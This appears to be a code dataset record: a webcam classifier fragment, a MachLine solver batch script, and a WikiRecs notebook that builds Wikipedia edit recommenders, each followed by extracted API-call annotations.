model.load(file_path=args.model_dir + '\model.h5')
with open(args.model_dir + '\labels.txt', 'r') as f:
for line in f.readlines():
classes.append(line.strip())
except OSError as e:
print("<--------------------Unable to open file-------------------->\n", e)
else:
cv2.namedWindow('Video')
# open le camera
capture = cv2.VideoCapture(0)
while capture.isOpened():
_, frame = capture.read()
cv2.rectangle(frame, (192, 112), (192 + FRAME_SIZE, 112 + FRAME_SIZE), (0, 255, 0), 2)
if switch:
detect(frame)
cv2.imshow('Video', frame)
key = cv2.waitKey(10)
if key == ord('z'):
switch = True
elif key == ord('d'):
switch = False
elif key == ord('s'):
crop_save(frame)
elif key == ord('q'): # exit
break
capture.release()
cv2.destroyWindow('Video')
else:
print('Input no found\nTry "python predict.py -h" for more information')
|
[
"cv2.putText",
"argparse.ArgumentParser",
"numpy.argmax",
"cv2.waitKey",
"cv2.imwrite",
"time.time",
"cv2.VideoCapture",
"training.Model",
"cv2.destroyWindow",
"cv2.rectangle",
"cv2.imshow",
"cv2.namedWindow"
] |
[((326, 343), 'numpy.argmax', 'np.argmax', (['result'], {}), '(result)\n', (335, 343), True, 'import numpy as np\n'), ((348, 419), 'cv2.putText', 'cv2.putText', (['image', 'classes[index]', '(192, 112)', 'font', '(1)', '(0, 255, 0)', '(2)'], {}), '(image, classes[index], (192, 112), font, 1, (0, 255, 0), 2)\n', (359, 419), False, 'import cv2\n'), ((564, 703), 'cv2.imwrite', 'cv2.imwrite', (["('C:\\\\Users\\\\Akira.DESKTOP-HM7OVCC\\\\Desktop\\\\database\\\\' + timestamp + '.png')", 'crop_image', '(cv2.IMWRITE_PNG_COMPRESSION, 0)'], {}), "('C:\\\\Users\\\\Akira.DESKTOP-HM7OVCC\\\\Desktop\\\\database\\\\' +\n timestamp + '.png', crop_image, (cv2.IMWRITE_PNG_COMPRESSION, 0))\n", (575, 703), False, 'import cv2\n'), ((769, 794), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (792, 794), False, 'import argparse\n'), ((547, 558), 'time.time', 'time.time', ([], {}), '()\n', (556, 558), False, 'import time\n'), ((986, 993), 'training.Model', 'Model', ([], {}), '()\n', (991, 993), False, 'from training import Model\n'), ((1370, 1394), 'cv2.namedWindow', 'cv2.namedWindow', (['"""Video"""'], {}), "('Video')\n", (1385, 1394), False, 'import cv2\n'), ((1447, 1466), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (1463, 1466), False, 'import cv2\n'), ((2127, 2153), 'cv2.destroyWindow', 'cv2.destroyWindow', (['"""Video"""'], {}), "('Video')\n", (2144, 2153), False, 'import cv2\n'), ((1565, 1656), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(192, 112)', '(192 + FRAME_SIZE, 112 + FRAME_SIZE)', '(0, 255, 0)', '(2)'], {}), '(frame, (192, 112), (192 + FRAME_SIZE, 112 + FRAME_SIZE), (0, \n 255, 0), 2)\n', (1578, 1656), False, 'import cv2\n'), ((1729, 1755), 'cv2.imshow', 'cv2.imshow', (['"""Video"""', 'frame'], {}), "('Video', frame)\n", (1739, 1755), False, 'import cv2\n'), ((1778, 1793), 'cv2.waitKey', 'cv2.waitKey', (['(10)'], {}), '(10)\n', (1789, 1793), False, 'import cv2\n')]
|
# This script is to run automate running machline for the Weber and Brebner results
import numpy as np
import json
import subprocess
import time
import multiprocessing as mp
import os
# Record and print the time required to run MachLine
start_time = time.time()
def mach_iter(AoA, Node, formulation, freestream):
if formulation == "source-free":
formulation_adjusted = "source_free"
else:
formulation_adjusted = formulation
# Modify freestream velocities based on angle of attack
AoA_rad = float(AoA)*np.pi/180
x_flow = freestream * np.cos(AoA_rad)
z_flow = freestream * np.sin(AoA_rad)
# Identify filebases used throughout iterator
filebase = "dev/results/half_wing_swept_45_deg/"
output_filebase = filebase + "MachLine_Results/" + AoA + "_degrees_AoA/half_wing_A_" + Node + "_nodes_" + AoA + "_deg_AoA_" + formulation_adjusted
# Rewrite the input files based on angle of attack and node densities
dict1 = {
"flow": {
"freestream_velocity": [
x_flow,
0.0,
z_flow
]
},
"geometry": {
"file": filebase + "half_wing_A_meshes/half_wing_A_" + Node + "_nodes.vtk",
"mirror_about": "xz",
"singularity_order": {
"doublet": 1,
"source": 0
},
"wake_model": {
"wake_shedding_angle": 90.0,
"trefftz_distance": 10000.0,
"N_panels": 1
},
"reference": {
"area": 1.0
}
},
"solver": {
"formulation": formulation,
"control_point_offset": 1.1e-05
},
"post_processing" : {
},
"output": {
"body_file": output_filebase + "_formulation.vtk",
"wake_file": output_filebase + "_formulation_wake.vtk",
"control_point_file": output_filebase + "_control_points.vtk",
"report_file": "../../report.txt"
}
}
# Identify output file location
filename = AoA + "_deg_angle_of_attack_input.json"
inputfile = filebase + 'half_wing_A_swept_inputs/' + filename
# file_location = "dev/results/half_wing_swept_45deg/test/" + AoA + "_degree_AoA_test_file_" + Node + "_nodes.json"
with open(inputfile, "w") as output_file:
json.dump(dict1, output_file, indent=4)
print("\n***",Node, "node input file saved successfully ***\n")
# Run machline with current input file
# machline_command = "./machline.exe {0}".format(inputfile)
subprocess.call(["./machline.exe", inputfile])
## Main
input_conditions = "Swept_half_wing_conditions_input.json"
json_string = open(input_conditions).read()
json_vals = json.loads(json_string)
# Identify values to pass from input conditions file
Nodes_input = json_vals["geometry"]["nodes"]
AoA_list_input = json_vals["geometry"]["AoA list"]
freestream_velocity = json_vals["flow conditions"]["freestream velocity"]
formulation_input = json_vals["solver"]["formulation"]
# Identify number of CPU available to work with
# n_processors = mp.cpu_count()
n_processors = 8
Arguments = []
# Change the working directory to the main MachLine directory for execution
os.chdir("../../../")
# Call the machline iterator with the desired inputs
with mp.Pool(n_processors) as pool:
for form in formulation_input:
for AoA in AoA_list_input:
for node in Nodes_input:
Arguments.append((AoA, node, form, freestream_velocity))
pool.starmap(mach_iter, Arguments)
pool.join()
# mach_iter(AoA_list_input, Nodes_input, formulation_input, freestream_velocity)
print("MachLine Iterator executed successfully in %s seconds" % "{:.4f}".format(time.time()-start_time))
|
[
"json.dump",
"json.loads",
"time.time",
"numpy.sin",
"subprocess.call",
"numpy.cos",
"multiprocessing.Pool",
"os.chdir"
] |
[((252, 263), 'time.time', 'time.time', ([], {}), '()\n', (261, 263), False, 'import time\n'), ((2816, 2839), 'json.loads', 'json.loads', (['json_string'], {}), '(json_string)\n', (2826, 2839), False, 'import json\n'), ((3313, 3334), 'os.chdir', 'os.chdir', (['"""../../../"""'], {}), "('../../../')\n", (3321, 3334), False, 'import os\n'), ((2642, 2688), 'subprocess.call', 'subprocess.call', (["['./machline.exe', inputfile]"], {}), "(['./machline.exe', inputfile])\n", (2657, 2688), False, 'import subprocess\n'), ((3394, 3415), 'multiprocessing.Pool', 'mp.Pool', (['n_processors'], {}), '(n_processors)\n', (3401, 3415), True, 'import multiprocessing as mp\n'), ((580, 595), 'numpy.cos', 'np.cos', (['AoA_rad'], {}), '(AoA_rad)\n', (586, 595), True, 'import numpy as np\n'), ((622, 637), 'numpy.sin', 'np.sin', (['AoA_rad'], {}), '(AoA_rad)\n', (628, 637), True, 'import numpy as np\n'), ((2412, 2451), 'json.dump', 'json.dump', (['dict1', 'output_file'], {'indent': '(4)'}), '(dict1, output_file, indent=4)\n', (2421, 2451), False, 'import json\n'), ((3828, 3839), 'time.time', 'time.time', ([], {}), '()\n', (3837, 3839), False, 'import time\n')]
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.10.3
# kernelspec:
# display_name: wikirecs
# language: python
# name: wikirecs
# ---
# # WikiRecs
# A project to recommend the next Wikipedia article you might like to edit
# + init_cell=true
# %matplotlib inline
# %load_ext autoreload
# %autoreload 2
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import logging
import wikipedia
import requests
import os
import wikirecs as wr
import implicit
from scipy.sparse import csr_matrix, csc_matrix, lil_matrix, coo_matrix
from tqdm.auto import tqdm
import umap
import pickle
import collections
import recommenders
import plotly.express as px
from pyarrow import feather
import itertools
from itables import show
import matplotlib
from implicit.nearest_neighbours import (
bm25_weight)
# -
from itables.javascript import load_datatables
load_datatables()
# + init_cell=true
pd.set_option('display.max_rows', 100)
pd.set_option('display.min_rows', 100)
# + init_cell=true
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
# -
# # Assemble the complete histories
import os
all_histories = []
for fname in os.listdir('edit_histories_2021-05-28'):
if 'feather' in fname:
all_histories.append(feather.read_feather('edit_histories_2021-05-28/{}'.format(fname)))
all_histories = pd.concat(all_histories, ignore_index=True)
feather.write_feather(all_histories, "all_histories_2021-05-28.feather")
# %%time
all_histories = feather.read_feather("all_histories_2021-05-28.feather")
all_histories.columns
len(all_histories.pageid.unique())
# # Load all_histories (raw data), transform and split
# +
# %%time
all_histories = feather.read_feather("all_histories_2021-05-28.feather")
print("Length raw edit history data: {}".format(len(all_histories)))
# +
from pull_edit_histories import get_edit_history
## Add one particular user
cols = ['userid', 'user', 'pageid', 'title',
'timestamp', 'sizediff']
with open("../username.txt", "r") as file:
for username in file:
oneuser = get_edit_history(user=username.strip(),
latest_timestamp="2021-05-28T22:02:09Z",
earliest_timestamp="2020-05-28T22:02:09Z")
oneuser = pd.DataFrame(oneuser).loc[:,cols]
all_histories = pd.concat([all_histories, oneuser], ignore_index=True)
print("Length after adding users: {}".format(len(all_histories)))
# -
# ## EDA on raw histories
# Look at the distribution of edit counts
edit_counts = all_histories.groupby('userid').userid.count().values
plt.figure(figsize=(20,8))
plt.subplot(1,2,1)
sns.distplot(edit_counts,kde=False,bins=np.arange(0,20000,200))
plt.xlabel('Number of edits by user')
plt.subplot(1,2,2)
sns.distplot(edit_counts,kde=False,bins=np.arange(0,200,1))
plt.xlim([0,200])
plt.xlabel('Number of edits by user')
num_counts = len(edit_counts)
print("Median edit counts: %d" % np.median(edit_counts))
thres = 5
over_thres = np.sum(edit_counts > thres)
print("Number over threshold %d: %d (%.f%%)" % (thres, over_thres, 100*over_thres/num_counts))
# Most edits by user
all_histories.groupby(['userid','user']).userid.count().sort_values(ascending=False)
# Find the elbow in number of edits
plt.plot(all_histories.groupby(['userid','user']).userid.count().sort_values(ascending=False).values)
# plt.ylim([0,20000])
# +
# What are the most popular pages (edited by the most users)
page_popularity = all_histories.drop_duplicates(subset=['title','user']).groupby('title').count().user.sort_values()
pd.set_option('display.max_rows', 1000)
page_popularity.iloc[-1000:].iloc[::-1]
# -
# ## Clean data
# ### Remove consecutive edits and summarize runs
# +
# %%time
def remove_consecutive_edits(df):
c = dict(zip(df.columns, range(len(df.columns))))
keyfunc = lambda x: (x[c['userid']],x[c['pageid']])
first_and_last = lambda run: [run[0][c['userid']],
run[0][c['user']],
run[0][c['pageid']],
run[0][c['title']],
run[-1][c['timestamp']],
run[0][c['timestamp']],
sum([abs(r[c['sizediff']]) for r in run]),
len(run)]
d = df.values.tolist()
return pd.DataFrame([first_and_last(list(g)) for k,g in itertools.groupby(d, key=keyfunc)],
columns=['userid', 'user', 'pageid', 'title', 'first_timestamp', 'last_timestamp','sum_sizediff','consecutive_edits'])
clean_histories = remove_consecutive_edits(all_histories)
# -
# ### Remove top N most popular pages
# +
# Get the top most popular pages
TOPN = 20
popularpages = all_histories.drop_duplicates(subset=['title','pageid','userid']).groupby(['title','pageid']).count().user.sort_values()[-TOPN:]
before_count = len(all_histories)
# -
popularpages
# Remove those popular pages
popular_pageids = popularpages.index.get_level_values(level='pageid').values
is_popular_page_edit = clean_histories.pageid.isin(popular_pageids)
clean_histories = clean_histories.loc[~is_popular_page_edit].copy()
all_histories = None
after_count = len(clean_histories)
print("%d edits (%.1f%%) were in top %d popular pages. Length after removing: %d" % (np.sum(is_popular_page_edit),
100* np.sum(is_popular_page_edit)/before_count,
TOPN,
after_count)
)
print("Number of unique page ids: {}".format(len(clean_histories.pageid.unique())))
# ### Remove users with too many or too few edits
MIN_EDITS = 5
MAX_EDITS = 10000
# Get user edit counts
all_user_edit_counts = clean_histories.groupby(['userid','user']).userid.count()
# +
# Remove users with too few edits
keep_user = all_user_edit_counts.values >= MIN_EDITS
# Remove users with too many edits
keep_user = keep_user & (all_user_edit_counts.values <= MAX_EDITS)
# Remove users with "bot" in the name
is_bot = ['bot' in username.lower() for username in all_user_edit_counts.index.get_level_values(1).values]
keep_user = keep_user & ~np.array(is_bot)
print("Keep %d users out of %d (%.1f%%)" % (np.sum(keep_user), len(all_user_edit_counts), 100*float(np.sum(keep_user))/len(all_user_edit_counts)))
# +
# Remove those users
userids_to_keep = all_user_edit_counts.index.get_level_values(0).values[keep_user]
clean_histories = clean_histories.loc[clean_histories.userid.isin(userids_to_keep)]
clean_histories = clean_histories.reset_index(drop=True)
# -
print("Length after removing users: {}".format(len(clean_histories)))
# %%time
# Save cleaned histories
feather.write_feather(clean_histories, '../clean_histories_2021-05-28.feather')
# ## Build lookup tables
# %%time
clean_histories = feather.read_feather('../clean_histories_2021-05-28.feather')
# +
# Page id to title and back
lookup = clean_histories.drop_duplicates(subset=['pageid']).loc[:,['pageid','title']]
p2t = dict(zip(lookup.pageid, lookup.title))
t2p = dict(zip(lookup.title, lookup.pageid))
# User id to name and back
lookup = clean_histories.drop_duplicates(subset=['userid']).loc[:,['userid','user']]
u2n = dict(zip(lookup.userid, lookup.user))
n2u = dict(zip(lookup.user, lookup.userid))
# +
# Page id and userid to index in cooccurence matrix and back
pageids = np.sort(clean_histories.pageid.unique())
userids = np.sort(clean_histories.userid.unique())
p2i = {pageid:i for i, pageid in enumerate(pageids)}
u2i = {userid:i for i, userid in enumerate(userids)}
i2p = {v: k for k, v in p2i.items()}
i2u = {v: k for k, v in u2i.items()}
# +
# User name and page title to index and back
n2i = {k:u2i[v] for k, v in n2u.items() if v in u2i}
t2i = {k:p2i[v] for k, v in t2p.items() if v in p2i}
i2n = {v: k for k, v in n2i.items()}
i2t = {v: k for k, v in t2i.items()}
# -
wr.save_pickle((p2t, t2p, u2n, n2u, p2i, u2i, i2p, i2u, n2i, t2i, i2n, i2t), '../lookup_tables_2021-05-28.pickle')
wr.save_pickle((userids, pageids), '../users_and_pages_2021-05-28.pickle')
#
# ## Build test and training set
p2t, t2p, u2n, n2u, p2i, u2i, i2p, i2u, n2i, t2i, i2n, i2t = wr.load_pickle('../lookup_tables_2021-05-28.pickle')
userids, pageids = wr.load_pickle('../users_and_pages_2021-05-28.pickle')
# Make a test set from the most recent edit by each user
histories_test = clean_histories.groupby(['userid','user'],as_index=False).first()
# Subtract it from the rest to make the training set
histories_train = wr.dataframe_set_subtract(clean_histories, histories_test)
histories_train.reset_index(drop=True, inplace=True)
# Make a dev set from the second most recent edit by each user
histories_dev = histories_train.groupby(['userid','user'],as_index=False).first()
# Subtract it from the rest to make the final training set
histories_train = wr.dataframe_set_subtract(histories_train, histories_dev)
histories_train.reset_index(drop=True, inplace=True)
print("Length of test set: {}".format(len(histories_test)))
print("Length of dev set: {}".format(len(histories_dev)))
print("Length of training after removal of test: {}".format(len(histories_train)))
print("Number of pages in training set: {}".format(len(histories_train.pageid.unique())))
print("Number of users in training set: {}".format(len(histories_train.userid.unique())))
print("Number of pages with > 1 user editing: {}".format(np.sum(histories_train.drop_duplicates(subset=['title','user']).groupby('title').count().user > 1)))
feather.write_feather(histories_train, '../histories_train_2021-05-28.feather')
feather.write_feather(histories_dev, '../histories_dev_2021-05-28.feather')
feather.write_feather(histories_test, '../histories_test_2021-05-28.feather')
# +
resurface_userids, discovery_userids = wr.get_resurface_discovery(histories_train, histories_dev)
print("%d out of %d userids are resurfaced (%.1f%%)" % (len(resurface_userids), len(userids), 100*float(len(resurface_userids))/len(userids)))
print("%d out of %d userids are discovered (%.1f%%)" % (len(discovery_userids), len(userids), 100*float(len(discovery_userids))/len(userids)))
# -
wr.save_pickle((resurface_userids, discovery_userids), '../resurface_discovery_users_2021-05-28.pickle')
# # FIG Rama and other examples
print("Number of edits by Rama in a year: {}".format(len(all_histories.loc[all_histories.user == 'Rama'])))
print("Number of pages edited: {}".format(len(all_histories.loc[all_histories.user == 'Rama'].drop_duplicates(subset=['pageid']))))
# +
from pull_edit_histories import get_edit_history
oneuser = get_edit_history(user="Thornstrom",
latest_timestamp="2021-05-28T22:02:09Z",
earliest_timestamp="2020-05-28T22:02:09Z")
oneuser = pd.DataFrame(oneuser).loc[:,cols]
# -
wr.print_user_history(all_histories, user="Rama")
wr.print_user_history(all_histories, user="Meow")
# # Build matrix for implicit collaborative filtering
# +
# %%time
# Get the user/page edit counts
for_implicit = histories_train.groupby(["userid","pageid"]).count().first_timestamp.reset_index().rename(columns={'first_timestamp':'edits'})
for_implicit.loc[:,'edits'] = for_implicit.edits.astype(np.int32)
# +
row = np.array([p2i[p] for p in for_implicit.pageid.values])
col = np.array([u2i[u] for u in for_implicit.userid.values])
implicit_matrix_coo = coo_matrix((for_implicit.edits.values, (row, col)))
implicit_matrix = csc_matrix(implicit_matrix_coo)
# -
# %%time
wr.save_pickle(implicit_matrix,'../implicit_matrix_2021-05-28.pickle')
# ### Test the matrix and indices
implicit_matrix = wr.load_pickle('../implicit_matrix_2021-05-28.pickle')
# +
# Crude item to item recs by looking for items edited by the same editors (count how many editors overlap)
veditors = np.flatnonzero(implicit_matrix[t2i['Hamburger'],:].toarray())
indices = np.flatnonzero(np.sum(implicit_matrix[:,veditors] > 0,axis=1))
totals = np.asarray(np.sum(implicit_matrix[:,veditors] > 0 ,axis=1)[indices])
sorted_order = np.argsort(totals.squeeze())
[i2t.get(i, "") + " " + str(total[0]) for i,total in zip(indices[sorted_order],totals[sorted_order])][::-1]
# -
# Histories of editors who had that item
for ved in veditors:
print("\n\n\n" + i2n[ved])
wr.print_user_history(all_histories, user=i2n[ved])
# # Implicit recommendation
implicit_matrix = wr.load_pickle('../implicit_matrix_2021-05-28.pickle')
p2t, t2p, u2n, n2u, p2i, u2i, i2p, i2u, n2i, t2i, i2n, i2t = wr.load_pickle('../lookup_tables_2021-05-28.pickle')
bm25_matrix = bm25_weight(implicit_matrix, K1=100, B=0.25)
num_factors =200
regularization = 0.01
os.environ["OPENBLAS_NUM_THREADS"] = "1"
model = implicit.als.AlternatingLeastSquares(
factors=num_factors, regularization=regularization
)
model.fit(bm25_matrix)
wr.save_pickle(model,'../als%d_bm25_model.pickle' % num_factors)
model = wr.load_pickle('../als200_bm25_model_2021-05-28.pickle')
results = model.similar_items(t2i['Steven Universe'],20)
['%s %.4f' % (i2t[ind], score) for ind, score in results]
u = n2u["Rama"]
recommendations = model.recommend(u2i[u], bm25_matrix.tocsc(), N=1000, filter_already_liked_items=False)
[ ("*" if implicit_matrix[ind,u2i[u]]>0 else "") +
'%s %.4f' % (i2t[ind], score) + ' %d' % (implicit_matrix[ind,:]>0).sum()
for ind, score in recommendations]
# ## Grid search results
grid_search_results = wr.load_pickle("../implicit_grid_search.pickle")
pd.DataFrame(grid_search_results)
pd.DataFrame([[i['num_factors'], i['regularization']] + list(i['metrics'].values()) for i in grid_search_results],
columns = ['num_factors','regularization'] + list(grid_search_results[0]['metrics'].keys()))
grid_search_results_bm25 = wr.load_pickle("../implicit_grid_search_bm25.pickle")
pd.DataFrame([[i['num_factors'], i['regularization']] + list(i['metrics'].values()) for i in grid_search_results_bm25],
columns = ['num_factors','regularization'] + list(grid_search_results_bm25[0]['metrics'].keys()))
# # B25 Recommendation
from implicit.nearest_neighbours import BM25Recommender
# +
bm25_matrix = bm25_weight(implicit_matrix, K1=20, B=1)
bm25_matrix = bm25_matrix.tocsc()
sns.distplot(implicit_matrix[implicit_matrix.nonzero()],bins = np.arange(0,100,1),kde=False)
sns.distplot(bm25_matrix[bm25_matrix.nonzero()],bins = np.arange(0,100,1),kde=False)
# -
K1 = 100
B = 0.25
model = BM25Recommender(K1, B)
model.fit(implicit_matrix)
wr.save_pickle(model, '../bm25_model_2021-05-28.pkl')
results = model.similar_items(t2i['<NAME>'],20)
['%s %.4f' % (i2t[ind], score) for ind, score in results]
a = ['Steven Universe 429.4746',
'List of Steven Universe episodes 178.4544',
'Demon Bear 128.7237',
'Legion of Super Heroes (TV series) 128.7237',
'The Amazing World of Gumball 126.3522',
'Steven Universe Future 123.9198']
results = model.similar_items(t2i['Steven Universe'],20)
['%s %.4f' % (i2t[ind], score) for ind, score in results]
results = model.similar_items(t2i['<NAME>'],20)
['%s %.4f' % (i2t[ind], score) for ind, score in results]
results = model.similar_items(t2i['Hamburger'],20)
['%s %.4f' % (i2t[ind], score) for ind, score in results]
u = n2u["Rama"]
recommendations = model.recommend(u2i[u], implicit_matrix.astype(np.float32), N=1000, filter_already_liked_items=True)
[ ("*" if implicit_matrix[ind,u2i[u]]>0 else "") +
'%s %.4f' % (i2t[ind], score)
for ind, score in recommendations]
plt.plot([ score for i,(ind, score) in enumerate(recommendations) if implicit_matrix[ind,u2i[u]]==0])
wr.save_pickle(model, "b25_model.pickle")
model = wr.load_pickle("b25_model.pickle")
# # Evaluate models
# ## Item to item recommendation
results = model.similar_items(t2i['Steven Universe'],20)
['%s %.4f' % (i2t[ind], score) for ind, score in results]
# ## User to item recommendations
# +
# Check out a specific example
u = n2u["HyprMarc"]
wr.print_user_history(clean_histories, userid=u)
# -
u = n2u["HyprMarc"]
recommendations = model.recommend(u2i[u], implicit_matrix, N=100, filter_already_liked_items=False)
[ ("*" if implicit_matrix[ind,u2i[u]]>0 else "") +
'%s %.4f' % (i2t[ind], score)
for ind, score in recommendations]
# # Visualize implicit embeddings
model = wr.load_pickle('../als150_model.pickle')
# +
# Only plot the ones with over 3 entries
indices = np.squeeze(np.asarray(np.sum(implicit_matrix[nonzero,:],axis=1))) > 3
indices = nonzero[indices]
# -
len(indices)
# Visualize the collaborative filtering item vectors, embedding into 2D space with UMAP
# nonzero = np.flatnonzero(implicit_matrix.sum(axis=1))
# indices = nonzero[::100]
embedding = umap.UMAP().fit_transform(model.item_factors[indices,:])
plt.figure(figsize=(10,10))
plt.plot(embedding[:,0], embedding[:,1],'.')
# _ = plt.axis('square')
# ## Visualize actors in the embeddings space
# +
edit_counts = np.squeeze(np.asarray(np.sum(implicit_matrix[indices,:],axis=1)))
log_edit_counts = np.log10(np.squeeze(np.asarray(np.sum(implicit_matrix[indices,:],axis=1))))
emb_df = pd.DataFrame({'dim1':embedding[:,0].squeeze(),
'dim2':embedding[:,1].squeeze(),
'title':[i2t[i] for i in indices],
'edit_count':edit_counts,
'log_edit_count':log_edit_counts
})
# -
actors = ['<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME> (actor)',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>']
actor_indices = [t2i[a] for a in actors]
edit_counts = np.squeeze(np.asarray(np.sum(implicit_matrix[actor_indices,:],axis=1)))
log_edit_counts = np.log10(np.squeeze(np.asarray(np.sum(implicit_matrix[actor_indices,:],axis=1))))
embedding = umap.UMAP().fit_transform(model.item_factors[actor_indices,:])
emb_df = pd.DataFrame({'dim1':embedding[:,0].squeeze(),
'dim2':embedding[:,1].squeeze(),
'title':[i2t[i] for i in actor_indices],
'edit_count':edit_counts,
'log_edit_count':log_edit_counts
})
key = np.zeros(len(actors))
key[:8] = 1
fig = px.scatter(data_frame=emb_df,
x='dim1',
y='dim2',
hover_name='title',
color=key,
hover_data=['edit_count'])
fig.update_layout(
autosize=False,
width=600,
height=600,)
fig.show()
# +
# Full embedding plotly interactive visualization
emb_df = pd.DataFrame({'dim1':embedding[:,0].squeeze(),
'dim2':embedding[:,1].squeeze(),
'title':[i2t[i] for i in indices],
'edit_count':edit_counts,
'log_edit_count':log_edit_counts
})
fig = px.scatter(data_frame=emb_df,
x='dim1',
y='dim2',
hover_name='title',
color='log_edit_count',
hover_data=['edit_count'])
fig.update_layout(
autosize=False,
width=600,
height=600,)
fig.show()
# -
# # Evaluate on test set
# +
# Load the edit histories in the training set and the test set
histories_train = feather.read_feather('../histories_train_2021-05-28.feather')
histories_test = feather.read_feather('../histories_test_2021-05-28.feather')
histories_dev = feather.read_feather('../histories_dev_2021-05-28.feather')
implicit_matrix = wr.load_pickle('../implicit_matrix_2021-05-28.pickle')
p2t, t2p, u2n, n2u, p2i, u2i, i2p, i2u, n2i, t2i, i2n, i2t = wr.load_pickle('../lookup_tables_2021-05-28.pickle')
userids, pageids = wr.load_pickle('../users_and_pages_2021-05-28.pickle')
resurface_userids, discovery_userids = wr.load_pickle('../resurface_discovery_users_2021-05-28.pickle')
results = {}
# -
wr.display_recs_with_history(
recs,
userids[:100],
histories_test,
histories_train,
p2t,
u2n,
recs_to_display=5,
hist_to_display=10,
)
# ## Most popular
# +
# %%time
K=20
rec_name = "Popularity"
prec = recommenders.PopularityRecommender(histories_train)
precs = prec.recommend_all(userids, K)
wr.save_pickle(precs, "../" + rec_name +"_recs.pickle")
# +
results[rec_name] = wr.get_recs_metrics(
histories_dev, precs, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
# -
# ## Most recent
# %%time
# Most recent
K=20
rrec = recommenders.MostRecentRecommender(histories_train)
rrecs = rrec.recommend_all(userids, K, interactions=histories_train)
rec_name = "Recent"
wr.save_pickle(rrecs, "../" + rec_name +"_recs.pickle")
len(resurface_userids)
results ={}
results[rec_name] = wr.get_recs_metrics(
histories_dev, rrecs, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
# ## Most frequent
# %%time
# Sorted by frequency of edits
K=20
frec = recommenders.MostFrequentRecommender(histories_train)
frecs = frec.recommend_all(userids, K, interactions=histories_train)
rec_name = "Frequent"
wr.save_pickle(frecs, "../" + rec_name +"_recs.pickle")
results[rec_name] = wr.get_recs_metrics(
histories_dev, frecs, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
# ## BM25
# %%time
K=20
brec = recommenders.MyBM25Recommender(model, implicit_matrix)
brecs = brec.recommend_all(userids, K, u2i=u2i, n2i=n2i, i2p=i2p, filter_already_liked_items=False)
rec_name = "bm25"
wr.save_pickle(brecs, "../" + rec_name +"_recs.pickle")
# filter_already_liked_items = False
results[rec_name] = wr.get_recs_metrics(
histories_dev, brecs, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
# filter_already_liked_items = True
rec_name = "bm25_filtered"
brecs_filtered = brec.recommend_all(userids, K, u2i=u2i, n2i=n2i, i2p=i2p, filter_already_liked_items=True)
wr.save_pickle(brecs_filtered, "../" + rec_name +"_recs.pickle")
results[rec_name] = wr.get_recs_metrics(
histories_dev, recs['bm25_filtered'], K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
results[rec_name] = wr.get_recs_metrics(
histories_dev, recs['bm25_filtered'], K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
# ## ALS Implicit collaborative filtering
model_als = wr.load_pickle('../als200_bm25_model_2021-05-28.pickle')
# %%time
rec_name = "als"
K=20
irec = recommenders.ImplicitCollaborativeRecommender(model_als, bm25_matrix.tocsc())
irecs = irec.recommend_all(userids, K, i2p=i2p, filter_already_liked_items=False)
wr.save_pickle(irecs, "../" + rec_name +"_recs.pickle")
results[rec_name] = wr.get_recs_metrics(
histories_dev, irecs, K, discovery_userids, resurface_userids, bm25_matrix.tocsc(), i2p, u2i)
results[rec_name]
rec_name = "als_filtered"
K=20
irec = recommenders.ImplicitCollaborativeRecommender(model_als, bm25_matrix.tocsc())
irecs_filtered = irec.recommend_all(userids, K, i2p=i2p, filter_already_liked_items=True)
results[rec_name] = wr.get_recs_metrics(
histories_dev, irecs_filtered, K, discovery_userids, resurface_userids, bm25_matrix.tocsc(), i2p, u2i)
results[rec_name]
wr.save_pickle(irecs_filtered, "../" + rec_name +"_recs.pickle")
show(pd.DataFrame(results).T)
# ## Jaccard
# %%time
# Sorted by Jaccard
K=20
rrec = recommenders.MostRecentRecommender(histories_train)
recent_pages_dict = rrec.all_recent_only(K, userids, interactions=histories_train)
jrec = recommenders.JaccardRecommender(implicit_matrix, p2i=p2i, t2i=t2i, i2t=i2t, i2p=i2p, n2i=n2i, u2i=u2i, i2u=i2u)
jrecs = jrec.recommend_all(userids,
K,
num_lookpage_pages=1,
recent_pages_dict=recent_pages_dict,
interactions=histories_train)
wr.save_pickle(jrecs,"jaccard-1_recs.pickle")
rec_name = "Jaccard"
results[rec_name] = wr.get_recs_metrics(
histories_dev, jrecs, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
wr.display_recs_with_history(
jrecs,
userids[:30],
histories_test,
histories_train,
p2t,
u2n,
recs_to_display=5,
hist_to_display=10,
)
# %%time
# Sorted by Jaccard
K=5
jrec = recommenders.JaccardRecommender(implicit_matrix, p2i=p2i, t2i=t2i, i2t=i2t, i2p=i2p, n2i=n2i, u2i=u2i, i2u=i2u)
jrecs = jrec.recommend_all(userids[:1000],
10,
num_lookpage_pages=50,
recent_pages_dict=recent_pages_dict,
interactions=histories_train)
print("Jaccard")
print("Recall @ %d: %.1f%%" % (K, 100*wr.recall(histories_test, jrecs, K)))
print("Prop resurfaced: %.1f%%" % (100*wr.prop_resurface(jrecs, K, implicit_matrix, i2p, u2i)))
print("Recall @ %d (discovery): %.1f%%" % (K, 100*wr.recall(histories_test, jrecs, K, userid_subset=discovery_userids)))
print("Recall @ %d (resurface): %.1f%%" % (K, 100*wr.recall(histories_test, jrecs, K, userid_subset=resurface_userids)))
# ## Interleaved
recs.keys()
# +
# Interleaved jaccard and recent
K=20
rec_name = "Interleaved"
print(rec_name)
intrec = recommenders.InterleaveRecommender()
